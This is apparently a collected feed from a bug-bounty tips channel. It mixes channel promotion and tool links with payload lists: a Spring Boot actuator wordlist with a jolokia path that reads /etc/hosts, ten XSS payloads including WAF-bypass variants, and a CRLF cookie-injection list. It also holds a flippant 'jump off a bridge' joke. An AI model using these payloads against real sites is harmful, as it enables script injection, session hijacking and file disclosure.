Bug bounty Tips
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
5 812 subscribers
I am looking for an admin who can post content and interact. Anyone here, and anyone already running a channel, is also eligible. I will make him an admin, but I have some terms and conditions.
Check out this new VDP program for this week, give an update and let me know if anyone is working on this program at least, and finally give a lot of reactions so that I can know that it is worth sharing things in this group.
New VDP Program - https://www.sonova.com/.well-known/security.txt
#PacktPub | Bug Bounty from Scratch : A comprehensive guide to discovering vulnerabilities and succeeding in cybersecurity
Info : https://www.packtpub.com/en-us/product/bug-bounty-from-scratch-9781803239255
PowerShell for Penetration Testing.
Explore the capabilities of PowerShell for pentesters across multiple platforms by Dr. Andrew Blyth, 2024
😎Add this to your wordlist:
actuator/env
actuator/auditevents
actuator/beans
actuator/caches
actuator/configprops
actuator/health
actuator/heapdump
actuator/info
actuator/integrationgraph
actuator/configprops
actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/hosts
#bugbountytip #bugbountytips #bugbounty
🚀A Practical Guide to Starting Your Cybersecurity Career in India🚀
✈️Link- https://ko-fi.com/post/A-Practical-Guide-to-Starting-Your-Cybersecurity-C-L4L410XGKI
I have shared a video on Instagram about which operating system is better, so do check it out guys
https://www.instagram.com/reel/C9ww22ry8Ub/?igsh=MzRlODBiNWFlZA==
🚀 Apepe - Mobile application pentesting🚀
🕵️ Apepe is a Python tool developed to help pentesters and red teamers easily get information from the target app. This tool will extract basic information such as the package name, whether the app is signed, and the development language...
🧾 Source - github.com/oppsec/Apepe
🔖10 Juicy XSS payloads that you can use.
1️⃣. ?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >
hackerone.com/reports/2433634
2️⃣. ?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
hackerone.com/reports/846338
The payload finishes the open function calls from jQuery, executes an alert as a PoC, and then finishes the original script tag
3️⃣. <a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
WAF / Cloudflare Bypass
4️⃣. ”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/> remove the underscores
hackerone.com/reports/484434
filtering using HTML entities for the alternation of <>, because I noticed that it's filtering the
5️⃣. <a href=[ ]" onmouseover=prompt(1)//">XYZ</a>
6️⃣. <script /*/>/*/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/*/</script /*/
7️⃣. <blink/ onmouseover=prompt(1)>OnMouseOver
Firefox & Opera
8️⃣. <svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>
9️⃣. <script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";a.click();</script>
1️⃣🅾️. jaVasCript:/--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>"'alert(1)
🐱 github
💡You can check the group for more resources
#XSS #BugBounty #BugBountyTips
🔸🔸 Share & Support Us 🔸 🔸
✔️ Channel: @bugbounty_tech
👥 Group: @bugbounty_talks
You know guys, today it's going to be 1 year since starting this channel. I didn't expect that I was going to reach this far, and near 1k followers too. I would like to thank one and all.
At first I was losing hope that this was going to happen, but today I realised that a long-term goal can keep you happy and being more consistent can do a lot of wonders.
Thanks everyone, and I will work hard on giving you guys more and better BugBounty tips.
And I have taken on a challenge that cipherops should be a part of the reason that everyone gets their first bounty happily.
📮JScripter - A noob-friendly JavaScript scraper based on #GAU and #hakrawler. Options to scan a single URL or multiple URLs from a list. Uses threads, saves files into a directory, and de-duplicates during saving.
✅Download- https://github.com/ifconfig-me/JScripter
#BugBounty #bugbountytips
How to fix the Crowdstrike thing:
1. Boot Windows into safe mode
2. Go to C:\Windows\System32\drivers\CrowdStrike
3. Delete C-00000291*.sys
4. Repeat for every host in your enterprise network including remote workers
5. If you're using BitLocker jump off a bridge
Bug Bounty Tip
CRLF Injection Attack Payload List
🔹 /%%0a0aSet-Cookie:crlf
🔹 /%0aSet-Cookie:crlf
🔹 /%0d%0aSet-Cookie:crlf
🔹 /%0dSet-Cookie:crlf
🔹 /%23%0aSet-Cookie:crlf
🔹 /%23%0d%0aSet-Cookie:crlf
🔹 /%23%0dSet-Cookie:crlf
🔹 /%25%30%61Set-Cookie:crlf
🔹 /%25%30aSet-Cookie:crlf
🔹 /%250aSet-Cookie:crlf
🔹 /%25250aSet-Cookie:crlf
🔹 /%2e%2e%2f%0d%0aSet-Cookie:crlf
🔹 /%2f%2e%2e%0d%0aSet-Cookie:crlf
🔹 /%2F..%0d%0aSet-Cookie:crlf
🔹 /%3f%0d%0aSet-Cookie:crlf
🔹 /%3f%0dSet-Cookie:crlf
🔹 /%u000aSet-Cookie:crlf
🔹 /%E5%98%8D%E5%98%8ASet-Cookie:crlf
#bugbounty #cybersecurity #ethicalhacking
Just discovered https://web-check.xyz and recommend that you do too!
It's an ALL-IN-ONE OSINT tool for analysing websites. You give it a URL and it gives you:
Server Location and IP info
SSL Certificate
Domain Whois
Server info
Cookies
Headers
DNS Records
HTTP Security
Social Tags
Security.txt
DNS Server
Firewall
DNS Security
HSTS Check
Threats
TLS Cipher Suites
TLS Security Issues
TLS Handshake Simulation
Redirects
Linked Pages
Crawl Rules
Server Status
Open ports
Text records
Carbon footprint
